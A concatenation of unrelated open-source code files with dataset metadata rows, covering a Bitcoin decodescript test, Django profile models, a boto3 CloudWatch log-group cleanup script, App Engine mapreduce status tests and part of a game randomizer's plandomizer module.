tx = '01000000018d1f5635abd06e2c7e2ddf58dc85b3de111e4ad6e0ab51bb0dcf5e84126d927300000000fdfe0000483045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea01483045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75014c695221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53aeffffffff02611e0000000000001976a914301102070101010101010102060101010101010188acee2a02000000000017a91430110207010101010101010206010101010101018700000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('OP_DUP OP_HASH160 3011020701010101010101020601010101010101 OP_EQUALVERIFY OP_CHECKSIG', rpc_result['vout'][0]['scriptPubKey']['asm'])
assert_equal('OP_HASH160 3011020701010101010101020601010101010101 OP_EQUAL', rpc_result['vout'][1]['scriptPubKey']['asm'])
# some more full transaction tests of varying specific scriptSigs. used instead of
# tests in decodescript_script_sig because the decodescript RPC is specifically
# for working on scriptPubKeys (argh!).
push_signature = txSave.vin[0].scriptSig.hex()[2:(0x48*2+4)]
signature = push_signature[2:]
der_signature = signature[:-2]
signature_sighash_decoded = der_signature + '[ALL]'
signature_2 = der_signature + '82'
push_signature_2 = '48' + signature_2
signature_2_sighash_decoded = der_signature + '[NONE|ANYONECANPAY]'
# 1) P2PK scriptSig
txSave.vin[0].scriptSig = bytes.fromhex(push_signature)
rpc_result = self.nodes[0].decoderawtransaction(txSave.serialize().hex())
assert_equal(signature_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# make sure that the sighash decodes come out correctly for a more complex / lesser used case.
txSave.vin[0].scriptSig = bytes.fromhex(push_signature_2)
rpc_result = self.nodes[0].decoderawtransaction(txSave.serialize().hex())
assert_equal(signature_2_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# 2) multisig scriptSig
txSave.vin[0].scriptSig = bytes.fromhex('00' + push_signature + push_signature_2)
rpc_result = self.nodes[0].decoderawtransaction(txSave.serialize().hex())
assert_equal('0 ' + signature_sighash_decoded + ' ' + signature_2_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# 3) test a scriptSig that contains more than push operations.
# in fact, it contains an OP_RETURN with data specially crafted to cause improper decode if the code does not catch it.
txSave.vin[0].scriptSig = bytes.fromhex('6a143011020701010101010101020601010101010101')
rpc_result = self.nodes[0].decoderawtransaction(txSave.serialize().hex())
assert_equal('OP_RETURN 3011020701010101010101020601010101010101', rpc_result['vin'][0]['scriptSig']['asm'])
def run_test(self):
self.decodescript_script_sig()
self.decodescript_script_pub_key()
self.decoderawtransaction_asm_sighashtype()
if __name__ == '__main__':
DecodeScriptTest().main()
| 69.567227 | 761 | 0.7569 |
2f9ba0db3279aaeca12fd97f17f6dfa20066cc10 | 2,789 | py | Python | src/tunewhale/profile/models.py | mariaaprilrose/fuck | f6b081ce3d6bdc59c9da3da2e7e70a5e36a560f1 | ["BSD-3-Clause"] | null | null | null | src/tunewhale/profile/models.py | mariaaprilrose/fuck | f6b081ce3d6bdc59c9da3da2e7e70a5e36a560f1 | ["BSD-3-Clause"] | 1 | 2015-07-15T06:18:34.000Z | 2015-07-15T06:18:49.000Z | src/tunewhale/profile/models.py | mariaaprilrose/fuck | f6b081ce3d6bdc59c9da3da2e7e70a5e36a560f1 | ["BSD-3-Clause"] | null | null | null |
import os
from django.conf import settings
from django.db import models
from django.contrib.auth.models import User
def update_avatar_filename(instance, filename):
extension = filename.split('.')[-1]
filename = '{0}.{1}'.format('avatar', extension)
path = '{0}{1}'.format(settings.USER_UPLOAD_PATH,
instance.user.username)
return os.path.join(path, filename)
def update_cover_filename(instance, filename):
extension = filename.split('.')[-1]
filename = '{0}.{1}'.format('cover', extension)
path = '{0}{1}'.format(settings.USER_UPLOAD_PATH,
instance.user.username)
return os.path.join(path, filename)
class UserProfile(models.Model):
user = models.OneToOneField(User)
date_registered = models.DateField(auto_now_add=True)
location = models.CharField(max_length=50, blank=True)
status = models.ImageField(upload_to=settings.STATUS_UPLOAD_PATH,
default=settings.BABYWHALE_IMG_PATH)
music_interests = models.TextField(blank=True)
music_genres = models.TextField(blank=True)
best_song_ever = models.CharField(max_length=100, blank=True)
bio = models.TextField(blank=True)
avatar = models.ImageField(upload_to=update_avatar_filename,
default=settings.DEFAULT_AVATAR_PATH)
cover = models.ImageField(upload_to=update_cover_filename,
default=settings.DEFAULT_COVER_PATH)
followers = models.ManyToManyField(User, blank=True,
related_name='followers')
following = models.ManyToManyField(User, blank=True,
related_name='following')
def __unicode__(self):
return self.user.username
def get_avatar_url(self):
filename = self.avatar.url.split('/')
new_filename = ''
for w in filename[2:]:
new_filename += w + '/'
return new_filename
def get_cover_url(self):
filename = self.cover.url.split('/')
new_filename = ''
for w in filename[2:]:
new_filename += w + '/'
return new_filename
def get_status_url(self):
filename = self.status.url.split('/')
new_filename = ''
for w in filename[2:]:
new_filename += w + '/'
return new_filename
def followers_count(self):
# possible additions in the future:
# - display numbers with commas, e.g. 15,000
# - as of now, the template can only display 8 digits with commas, 9 digits without commas
# - display millions (and higher) with letter, e.g. 1.2M, 15M
count = 0
for user in self.followers.all():
count += 1
return count
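        # Editorial note (added): the ORM can compute this directly and more
        # cheaply, e.g. `return self.followers.count()`.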
| 42.257576 | 100 | 0.621011 |
288da210651d5f7d8193354cb24fe917bdf025cd | 567 | py | Python | grapl-cdk/delete_log_groups.py | Seabreg/grapl | 8316cda9996bea051b77cb5a7b892113b8a2b0e3 | ["Apache-2.0"] | null | null | null | grapl-cdk/delete_log_groups.py | Seabreg/grapl | 8316cda9996bea051b77cb5a7b892113b8a2b0e3 | ["Apache-2.0"] | null | null | null | grapl-cdk/delete_log_groups.py | Seabreg/grapl | 8316cda9996bea051b77cb5a7b892113b8a2b0e3 | ["Apache-2.0"] | null | null | null |
import json
import boto3
cwlogs = boto3.client('logs')
loglist = cwlogs.describe_log_groups(
logGroupNamePrefix='engagement'
)
#writes json output to file...
with open('loglist.json', 'w') as outfile:
json.dump(loglist, outfile, ensure_ascii=False, indent=4,
sort_keys=True)
#Opens file and searches through to find given loggroup name
with open("loglist.json") as f:
file_parsed = json.load(f)
for i in file_parsed['logGroups']:
print(i['logGroupName'])
cwlogs.delete_log_group(
logGroupName=(i['logGroupName'])
)
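# Editorial note (added): describe_log_groups returns at most 50 groups per
# call; for larger accounts a paginator would be needed, e.g. (sketch):
#     paginator = cwlogs.get_paginator('describe_log_groups')
#     for page in paginator.paginate(logGroupNamePrefix='engagement'):
#         for group in page['logGroups']:
#             cwlogs.delete_log_group(logGroupName=group['logGroupName'])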
| 22.68 | 61 | 0.696649 |
97afd65a824953c7976aff894c098225994792a4 | 20,582 | py | Python | python/test/mapreduce/status_test.py | Khan/appengine-mapreduce-1 | 7afdd4f6ae523c55a12273dec6649d7f71ce2379 | ["Apache-2.0"] | null | null | null | python/test/mapreduce/status_test.py | Khan/appengine-mapreduce-1 | 7afdd4f6ae523c55a12273dec6649d7f71ce2379 | ["Apache-2.0"] | null | null | null | python/test/mapreduce/status_test.py | Khan/appengine-mapreduce-1 | 7afdd4f6ae523c55a12273dec6649d7f71ce2379 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import tempfile
import time
import unittest
try:
import json
except ImportError:
import simplejson as json
from google.appengine.api import yaml_errors
from google.appengine.ext import db
from mapreduce import errors
from mapreduce import handlers
from mapreduce import status
from testlib import testutil
from mapreduce import test_support
from google.appengine.ext.webapp import mock_webapp
class TestKind(db.Model):
"""Used for testing."""
foobar = db.StringProperty(default="meep")
def TestMap(entity):
"""Used for testing."""
pass
class MapreduceYamlTest(unittest.TestCase):
"""Testing mapreduce.yaml-related functionality."""
def set_up_directory_tree(self, dir_tree_contents):
"""Create directory tree from dict of path:contents entries."""
for full_path, contents in dir_tree_contents.iteritems():
dir_name = os.path.dirname(full_path)
if not os.path.isdir(dir_name):
os.makedirs(dir_name)
f = open(full_path, 'w')
f.write(contents)
f.close()
def setUp(self):
"""Initialize temporary application variable."""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Remove temporary application directory."""
if self.tempdir:
shutil.rmtree(self.tempdir)
def testFindYamlFile(self):
"""Test if mapreduce.yaml can be found with different app/library trees."""
test_status = os.path.join(self.tempdir, "library_root", "google",
"appengine", "ext", "mapreduce", "status.py")
test_mapreduce_yaml = os.path.join(self.tempdir, "application_root",
"mapreduce.yaml")
test_dict = {
test_status: "test",
test_mapreduce_yaml: "test",
}
self.set_up_directory_tree(test_dict)
os.chdir(os.path.dirname(test_mapreduce_yaml))
yaml_loc = status.find_mapreduce_yaml(status_file=test_status)
self.assertEqual(test_mapreduce_yaml, yaml_loc)
def testFindYamlFileSameTree(self):
"""Test if mapreduce.yaml can be found with the same app/library tree."""
test_status = os.path.join(self.tempdir, "application_root", "google",
"appengine", "ext", "mapreduce", "status.py")
test_mapreduce_yaml = os.path.join(self.tempdir, "application_root",
"mapreduce.yaml")
test_dict = {
test_status: "test",
test_mapreduce_yaml: "test",
}
self.set_up_directory_tree(test_dict)
os.chdir(os.path.dirname(test_mapreduce_yaml))
yaml_loc = status.find_mapreduce_yaml(status_file=test_status)
self.assertEqual(test_mapreduce_yaml, yaml_loc)
def testParseEmptyFile(self):
"""Parsing empty mapreduce.yaml file."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"")
def testParse(self):
"""Parsing a single document in mapreduce.yaml."""
mr_yaml = status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" params_validator: Validator1\n"
" params:\n"
" - name: entity_kind\n"
" default: Kind1\n"
" - name: human_supplied1\n"
" - name: human_supplied2\n"
"- name: Mapreduce2\n"
" mapper:\n"
" handler: Handler2\n"
" input_reader: Reader2\n")
self.assertTrue(mr_yaml)
self.assertEquals(2, len(mr_yaml.mapreduce))
self.assertEquals("Mapreduce1", mr_yaml.mapreduce[0].name)
self.assertEquals("Handler1", mr_yaml.mapreduce[0].mapper.handler)
self.assertEquals("Reader1", mr_yaml.mapreduce[0].mapper.input_reader)
self.assertEquals("Validator1",
mr_yaml.mapreduce[0].mapper.params_validator)
self.assertEquals(3, len(mr_yaml.mapreduce[0].mapper.params))
self.assertEquals("entity_kind", mr_yaml.mapreduce[0].mapper.params[0].name)
self.assertEquals("Kind1", mr_yaml.mapreduce[0].mapper.params[0].default)
self.assertEquals("human_supplied1",
mr_yaml.mapreduce[0].mapper.params[1].name)
self.assertEquals("human_supplied2",
mr_yaml.mapreduce[0].mapper.params[2].name)
self.assertEquals("Mapreduce2", mr_yaml.mapreduce[1].name)
self.assertEquals("Handler2", mr_yaml.mapreduce[1].mapper.handler)
self.assertEquals("Reader2", mr_yaml.mapreduce[1].mapper.input_reader)
def testParseOutputWriter(self):
"""Parsing a single document in mapreduce.yaml with output writer."""
mr_yaml = status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" output_writer: Writer1\n"
)
self.assertTrue(mr_yaml)
self.assertEquals(1, len(mr_yaml.mapreduce))
self.assertEquals("Mapreduce1", mr_yaml.mapreduce[0].name)
self.assertEquals("Handler1", mr_yaml.mapreduce[0].mapper.handler)
self.assertEquals("Reader1", mr_yaml.mapreduce[0].mapper.input_reader)
self.assertEquals("Writer1", mr_yaml.mapreduce[0].mapper.output_writer)
def testParseMissingRequiredAttrs(self):
"""Test parsing with missing required attributes."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n")
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" input_reader: Reader1\n")
def testBadValues(self):
"""Tests when some yaml values are of the wrong type."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" params:\n"
" - name: $$Invalid$$\n")
def testMultipleDocuments(self):
"""Tests when multiple documents are present."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
"---")
def testOverlappingNames(self):
"""Tests when there are jobs with the same name."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n")
def testToDict(self):
"""Tests encoding the MR document as JSON."""
mr_yaml = status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" params_validator: Validator1\n"
" params:\n"
" - name: entity_kind\n"
" default: Kind1\n"
" - name: human_supplied1\n"
" - name: human_supplied2\n"
"- name: Mapreduce2\n"
" mapper:\n"
" handler: Handler2\n"
" input_reader: Reader2\n")
all_configs = status.MapReduceYaml.to_dict(mr_yaml)
self.assertEquals(
[
{
'name': 'Mapreduce1',
'mapper_params_validator': 'Validator1',
'mapper_params': {
'entity_kind': 'Kind1',
'human_supplied2': None,
'human_supplied1': None},
'mapper_handler': 'Handler1',
'mapper_input_reader': 'Reader1'
},
{
'mapper_input_reader': 'Reader2',
'mapper_handler': 'Handler2',
'name': 'Mapreduce2'
}
], all_configs)
def testToDictOutputWriter(self):
"""Tests encoding the MR document with output writer as JSON."""
mr_yaml = status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" output_writer: Writer1\n"
)
all_configs = status.MapReduceYaml.to_dict(mr_yaml)
self.assertEquals(
[
{
'name': 'Mapreduce1',
'mapper_handler': 'Handler1',
'mapper_input_reader': 'Reader1',
'mapper_output_writer': 'Writer1',
},
], all_configs)
class ResourceTest(testutil.HandlerTestBase):
"""Tests for the resource handler."""
def setUp(self):
"""Sets up the test harness."""
testutil.HandlerTestBase.setUp(self)
self.handler = status.ResourceHandler()
self.handler.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.handler.request.path = "/mapreduce/path"
def testPaths(self):
"""Tests that paths are accessible."""
self.handler.get("status")
self.assertTrue(self.handler.response.out.getvalue().startswith(
"<!DOCTYPE html>"))
self.assertEquals("text/html",
self.handler.response.headers["Content-Type"])
self.handler.response.out.truncate(0)
self.handler.get("jquery.js")
self.assertTrue(self.handler.response.out.getvalue().startswith(
"/*!"))
self.assertEquals("text/javascript",
self.handler.response.headers["Content-Type"])
def testCachingHeaders(self):
"""Tests that caching headers are correct."""
self.handler.get("status")
self.assertEquals("public; max-age=300",
self.handler.response.headers["Cache-Control"])
def testMissing(self):
"""Tests when a resource is requested that doesn't exist."""
self.handler.get("unknown")
self.assertEquals(404, self.handler.response.status)
class ListConfigsTest(testutil.HandlerTestBase):
"""Tests for the ListConfigsHandler."""
def setUp(self):
"""Sets up the test harness."""
testutil.HandlerTestBase.setUp(self)
self.handler = status.ListConfigsHandler()
self.handler.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.handler.request.path = "/mapreduce/command/path"
self.handler.request.headers["X-Requested-With"] = "XMLHttpRequest"
def testCSRF(self):
"""Test that we check the X-Requested-With header."""
del self.handler.request.headers["X-Requested-With"]
self.handler.get()
self.assertEquals(403, self.handler.response.status)
def testBasic(self):
"""Tests listing available configs."""
old_get_yaml = status.get_mapreduce_yaml
status.get_mapreduce_yaml = lambda: status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" params_validator: Validator1\n"
" params:\n"
" - name: entity_kind\n"
" default: Kind1\n"
" - name: human_supplied1\n"
" - name: human_supplied2\n"
"- name: Mapreduce2\n"
" mapper:\n"
" handler: Handler2\n"
" input_reader: Reader2\n"
" params_validator: MapreduceValidator\n"
" params:\n"
" - name: foo\n"
" value: bar\n")
try:
self.handler.get()
finally:
status.get_mapreduce_yaml = old_get_yaml
self.assertEquals(
{u'configs': [
{u'mapper_params_validator': u'Validator1',
u'mapper_params': {
u'entity_kind': u'Kind1',
u'human_supplied2': None,
u'human_supplied1': None},
u'mapper_input_reader': u'Reader1',
u'mapper_handler': u'Handler1',
u'name': u'Mapreduce1'},
{u'mapper_input_reader': u'Reader2',
u'mapper_handler': u'Handler2',
u'name': u'Mapreduce2',
u'params': {
u'foo': u'bar',},
}]},
json.loads(self.handler.response.out.getvalue()))
self.assertEquals("text/javascript",
self.handler.response.headers["Content-Type"])
class ListJobsTest(testutil.HandlerTestBase):
"""Tests listing active and inactive jobs."""
def setUp(self):
"""Sets up the test harness."""
testutil.HandlerTestBase.setUp(self)
self.start = handlers.StartJobHandler()
self.start.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.start.request.path = "/mapreduce/command/start"
self.start.request.set(
"mapper_input_reader",
"mapreduce.input_readers.DatastoreInputReader")
self.start.request.set("mapper_handler", "__main__.TestMap")
self.start.request.set("mapper_params.entity_kind", "__main__.TestKind")
self.start.request.headers["X-Requested-With"] = "XMLHttpRequest"
self.handler = status.ListJobsHandler()
self.handler.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.handler.request.path = "/mapreduce/command/list"
self.handler.request.headers["X-Requested-With"] = "XMLHttpRequest"
def testCSRF(self):
"""Test that we check the X-Requested-With header."""
TestKind().put()
del self.start.request.headers["X-Requested-With"]
self.start.post()
self.assertEquals(403, self.start.response.status)
del self.handler.request.headers["X-Requested-With"]
self.handler.get()
self.assertEquals(403, self.handler.response.status)
def testBasic(self):
"""Tests when there are fewer than the max results to render."""
TestKind().put()
self.start.request.set("name", "my job 1")
self.start.post()
time.sleep(.1)
self.start.request.set("name", "my job 2")
self.start.post()
time.sleep(.1)
self.start.request.set("name", "my job 3")
self.start.post()
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
expected_args = set([
"active",
"active_shards",
"chart_url",
"chart_width",
"mapreduce_id",
"name",
"shards",
"start_timestamp_ms",
"updated_timestamp_ms",
])
self.assertEquals(3, len(result["jobs"]))
self.assertEquals("my job 3", result["jobs"][0]["name"])
self.assertEquals("my job 2", result["jobs"][1]["name"])
self.assertEquals("my job 1", result["jobs"][2]["name"])
self.assertEquals(expected_args, set(result["jobs"][0].keys()))
self.assertEquals(expected_args, set(result["jobs"][1].keys()))
self.assertEquals(expected_args, set(result["jobs"][2].keys()))
def testCursor(self):
"""Tests when a job cursor is present."""
TestKind().put()
self.start.request.set("name", "my job 1")
self.start.post()
time.sleep(.1) # Can not start two jobs before time advances
self.start.request.set("name", "my job 2")
self.start.post()
self.handler.request.set("count", "1")
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
self.assertEquals(1, len(result["jobs"]))
self.assertTrue("cursor" in result)
self.handler.response.out.truncate(0)
self.handler.request.set("count", "1")
self.handler.request.set("cursor", result['cursor'])
self.handler.get()
result2 = json.loads(self.handler.response.out.getvalue())
self.assertEquals(1, len(result2["jobs"]))
self.assertFalse("cursor" in result2)
def testNoJobs(self):
"""Tests when there are no jobs."""
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
self.assertEquals({'jobs': []}, result)
class GetJobDetailTest(testutil.HandlerTestBase):
"""Tests listing job status detail."""
def setUp(self):
"""Sets up the test harness."""
testutil.HandlerTestBase.setUp(self)
for _ in range(100):
TestKind().put()
self.start = handlers.StartJobHandler()
self.start.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.start.request.path = "/mapreduce/command/start"
self.start.request.set("name", "my job 1")
self.start.request.set(
"mapper_input_reader",
"mapreduce.input_readers.DatastoreInputReader")
self.start.request.set("mapper_handler", "__main__.TestMap")
self.start.request.set("mapper_params.entity_kind", "__main__.TestKind")
self.start.request.headers["X-Requested-With"] = "XMLHttpRequest"
self.start.post()
result = json.loads(self.start.response.out.getvalue())
self.mapreduce_id = result["mapreduce_id"]
self.handler = status.GetJobDetailHandler()
self.handler.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.handler.request.path = "/mapreduce/command/list"
self.handler.request.headers["X-Requested-With"] = "XMLHttpRequest"
def KickOffMapreduce(self):
"""Executes pending kickoff task."""
test_support.execute_all_tasks(self.taskqueue)
def testCSRF(self):
"""Test that we check the X-Requested-With header."""
del self.handler.request.headers["X-Requested-With"]
self.handler.get()
self.assertEquals(403, self.handler.response.status)
def testBasic(self):
"""Tests getting the job details."""
self.KickOffMapreduce()
self.handler.request.set("mapreduce_id", self.mapreduce_id)
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
expected_keys = set([
"active", "chart_url", "counters", "mapper_spec", "mapreduce_id",
"name", "result_status", "shards", "start_timestamp_ms",
"updated_timestamp_ms", "params", "hooks_class_name", "chart_width"])
expected_shard_keys = set([
"active", "counters", "last_work_item", "result_status",
"shard_description", "shard_id", "shard_number",
"updated_timestamp_ms"])
self.assertEquals(expected_keys, set(result.keys()))
self.assertEquals(8, len(result["shards"]))
self.assertEquals(expected_shard_keys, set(result["shards"][0].keys()))
def testBeforeKickOff(self):
"""Tests getting the job details."""
self.handler.request.set("mapreduce_id", self.mapreduce_id)
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
expected_keys = set([
"active", "chart_url", "counters", "mapper_spec", "mapreduce_id",
"name", "result_status", "shards", "start_timestamp_ms",
"updated_timestamp_ms", "params", "hooks_class_name", "chart_width"])
self.assertEquals(expected_keys, set(result.keys()))
def testBadJobId(self):
"""Tests when an invalid job ID is supplied."""
self.handler.request.set("mapreduce_id", "does not exist")
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
self.assertEquals(
{"error_message": "\"Could not find job with ID 'does not exist'\"",
"error_class": "KeyError"},
result)
# TODO(user): Add tests for abort
# TODO(user): Add tests for cleanup
if __name__ == "__main__":
unittest.main()
| 35.794783
| 80
| 0.620396
|
abe1adb6164e2536c240dd2fa3311cb720f14fe2
| 371
|
py
|
Python
|
diego/classifier/__init__.py
|
lai-bluejay/diego-automl
|
84e8255cf372be43ae9ca9a4586faadc4d5750a2
|
[
"MIT"
] | 7
|
2019-03-22T14:56:06.000Z
|
2021-02-02T02:19:19.000Z
|
diego/classifier/__init__.py
|
lai-bluejay/diego-automl
|
84e8255cf372be43ae9ca9a4586faadc4d5750a2
|
[
"MIT"
] | 1
|
2019-05-30T03:34:18.000Z
|
2019-06-20T13:47:08.000Z
|
diego/classifier/__init__.py
|
lai-bluejay/diego-automl
|
84e8255cf372be43ae9ca9a4586faadc4d5750a2
|
[
"MIT"
] | 2
|
2020-04-17T14:11:59.000Z
|
2021-02-02T02:19:28.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
classifier/__init__.py was created on 2019/04/25.
file in :relativeFile
Author: Charles_Lai
Email: lai.bluejay@gmail.com
"""
from diego.classifier.base import DiegoClassifier
from diego.classifier.logistic_regression import LogisticRegressionSMAC
from diego.classifier.logistic_regression_sk import LogisticRegressionSK
| 30.916667
| 72
| 0.808625
|
a91999d5a65a7349dc79e5e98f0fe295bfa31eb7
| 37,812
|
py
|
Python
|
Plandomizer.py
|
maedas/OoTR-BQ
|
ef98b0d84b3fb7364af45a31c98e6b271c365f5c
|
[
"MIT"
] | null | null | null |
Plandomizer.py
|
maedas/OoTR-BQ
|
ef98b0d84b3fb7364af45a31c98e6b271c365f5c
|
[
"MIT"
] | 2
|
2019-12-04T12:58:13.000Z
|
2019-12-04T13:01:30.000Z
|
Plandomizer.py
|
maedas/OoTR-BQ
|
ef98b0d84b3fb7364af45a31c98e6b271c365f5c
|
[
"MIT"
] | null | null | null |
import itertools
import json
import logging
import re
import random
from functools import reduce
from Fill import FillError
from EntranceShuffle import EntranceShuffleError, change_connections, confirm_replacement, validate_world, check_entrances_compatibility
from Hints import gossipLocations, GossipText
from Item import ItemFactory, ItemIterator, IsItem
from ItemPool import item_groups, get_junk_item
from Location import LocationIterator, LocationFactory, IsLocation
from LocationList import location_groups
from Playthrough import Playthrough
from Spoiler import HASH_ICONS
from version import __version__
from Utils import random_choices
from JSONDump import dump_obj, CollapseList, CollapseDict, AllignedDict, SortedDict
class InvalidFileException(Exception):
pass
per_world_keys = (
'randomized_settings',
'starting_items',
'item_pool',
'dungeons',
'trials',
'entrances',
'locations',
':woth_locations',
':barren_regions',
'gossip_stones',
)
search_groups = {
**location_groups,
**item_groups,
}
def SimpleRecord(props):
class Record(object):
def __init__(self, src_dict=None):
self.update(src_dict, update_all=True)
def update(self, src_dict, update_all=False):
if src_dict is None:
src_dict = {}
for k, p in props.items():
if update_all or k in src_dict:
setattr(self, k, src_dict.get(k, p))
def to_json(self):
return {k: getattr(self, k) for (k, d) in props.items() if getattr(self, k) != d}
def __str__(self):
return dump_obj(self.to_json())
return Record
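# Illustrative sketch, not part of the original module: shows how SimpleRecord builds
# a record class whose to_json() only emits fields that differ from their defaults.
# The field names 'count' and 'label' are hypothetical.
def _simple_record_example():
    ExampleRecord = SimpleRecord({'count': 1, 'label': None})
    record = ExampleRecord({'count': 3})
    return record.to_json()  # {'count': 3}; 'label' is omitted because it kept its default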
class DungeonRecord(SimpleRecord({'mq': None})):
def __init__(self, src_dict='random'):
if src_dict == 'random':
src_dict = {'mq': None}
if src_dict == 'mq':
src_dict = {'mq': True}
if src_dict == 'vanilla':
src_dict = {'mq': False}
super().__init__(src_dict)
def to_json(self):
if self.mq is None:
return 'random'
return 'mq' if self.mq else 'vanilla'
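# Illustrative sketch, not part of the original module: DungeonRecord normalizes the
# three accepted spellings into a single 'mq' flag and serializes back to the same word.
def _dungeon_record_example():
    assert DungeonRecord('mq').to_json() == 'mq'
    assert DungeonRecord('vanilla').to_json() == 'vanilla'
    assert DungeonRecord().to_json() == 'random'  # default: leave the decision to the randomizer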
class GossipRecord(SimpleRecord({'text': None, 'colors': None})):
def to_json(self):
if self.colors is not None:
self.colors = CollapseList(self.colors)
return CollapseDict(super().to_json())
class ItemPoolRecord(SimpleRecord({'type': 'set', 'count': 1})):
def __init__(self, src_dict=1):
if isinstance(src_dict, int):
src_dict = {'count':src_dict}
super().__init__(src_dict)
def to_json(self):
if self.type == 'set':
return self.count
else:
return CollapseDict(super().to_json())
def update(self, src_dict, update_all=False):
super().update(src_dict, update_all)
if self.count < 0:
raise ValueError("Count cannot be negative in an ItemPoolRecord.")
if self.type not in ['add', 'remove', 'set']:
raise ValueError("Type must be 'add', 'remove', or 'set' in an ItemPoolRecord.")
class LocationRecord(SimpleRecord({'item': None, 'player': None, 'price': None, 'model': None})):
def __init__(self, src_dict):
if isinstance(src_dict, str):
src_dict = {'item':src_dict}
super().__init__(src_dict)
def to_json(self):
self_dict = super().to_json()
if list(self_dict.keys()) == ['item']:
return str(self.item)
else:
return CollapseDict(self_dict)
@staticmethod
def from_item(item):
if item.world.settings.world_count > 1:
player = item.world.id + 1
else:
player = None if item.location is not None and item.world is item.location.world else (item.world.id + 1)
return LocationRecord({
'item': item.name,
'player': player,
'model': item.looks_like_item.name if item.looks_like_item is not None and item.location.has_preview() and can_cloak(item, item.looks_like_item) else None,
'price': item.location.price,
})
class EntranceRecord(SimpleRecord({'region': None, 'origin': None})):
def __init__(self, src_dict):
if isinstance(src_dict, str):
src_dict = {'region':src_dict}
if 'from' in src_dict:
src_dict['origin'] = src_dict['from']
del src_dict['from']
super().__init__(src_dict)
def to_json(self):
self_dict = super().to_json()
if list(self_dict.keys()) == ['region']:
return str(self.region)
else:
self_dict['from'] = self_dict['origin']
del self_dict['origin']
return CollapseDict(self_dict)
@staticmethod
def from_entrance(entrance):
if entrance.replaces.primary and entrance.replaces.type in ('Interior', 'SpecialInterior', 'Grotto', 'Grave'):
origin_name = None
else:
origin_name = entrance.replaces.parent_region.name
return EntranceRecord({
'region': entrance.connected_region.name,
'origin': origin_name,
})
class StarterRecord(SimpleRecord({'count': 1})):
def __init__(self, src_dict=1):
if isinstance(src_dict, int):
src_dict = {'count': src_dict}
super().__init__(src_dict)
def to_json(self):
return self.count
class TrialRecord(SimpleRecord({'active': None})):
def __init__(self, src_dict='random'):
if src_dict == 'random':
src_dict = {'active': None}
if src_dict == 'active':
src_dict = {'active': True}
if src_dict == 'inactive':
src_dict = {'active': False}
super().__init__(src_dict)
def to_json(self):
if self.active is None:
return 'random'
return 'active' if self.active else 'inactive'
class WorldDistribution(object):
def __init__(self, distribution, id, src_dict={}):
self.distribution = distribution
self.id = id
self.base_pool = []
self.song_as_items = False
self.update(src_dict, update_all=True)
def update(self, src_dict, update_all=False):
update_dict = {
'randomized_settings': {name: record for (name, record) in src_dict.get('randomized_settings', {}).items()},
